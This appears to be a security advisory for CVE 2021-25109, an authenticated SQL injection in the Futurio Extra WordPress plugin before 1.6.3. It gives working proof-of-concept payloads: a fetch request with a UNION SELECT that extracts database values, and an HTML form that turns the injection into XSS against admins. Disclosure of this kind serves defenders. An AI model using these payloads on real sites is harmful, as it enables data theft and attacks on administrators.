Futurio Extra < 1.6.3 – Authenticated SQL Injection | CVE 2021-25109

Description

The plugin is affected by a SQL Injection vulnerability that could be used by high privilege users to extract data from the database as well as used to perform Cross-Site Scripting (XSS) against logged in admins by making send open a malicious link

Proof of Concept

Using SQLi to extract database variables:

fetch("http://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "body": new URLSearchParams({"action": "dilaz_mb_query_select", "q": '" union select 0,1,2,3,4,@@version,6,7,8,9,10,11,2,3,4,5,6,7,8,9,10,11,12 -- g', "query_args": "YToxOntzOjE0OiJwb3N0c19wZXJfcGFnZSI7aTo1MDE7fQ==", "query_type": "post"}),
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Using SQLi for XSS (works in Firefox, not in Chrome due to same-site behavior):

<form action="http://example.com/wp-admin/admin-ajax.php" method="POST">
  <input type="text" name="action" value="dilaz_mb_query_select">
  <input type="text" name="q" value='" union select 0,1,2,3,4,0x3c696d6720737263206f6e6572726f723d616c6572742831293e,6,7,8,9,10,11,2,3,4,5,6,7,8,9,10,11,12 -- g'>
  <input type="text" name="query_args" value="YToxOntzOjE0OiJwb3N0c19wZXJfcGFnZSI7aTo1MDE7fQ==">
  <input type="text" name="query_type" value="post">
  <input type="submit">
</form>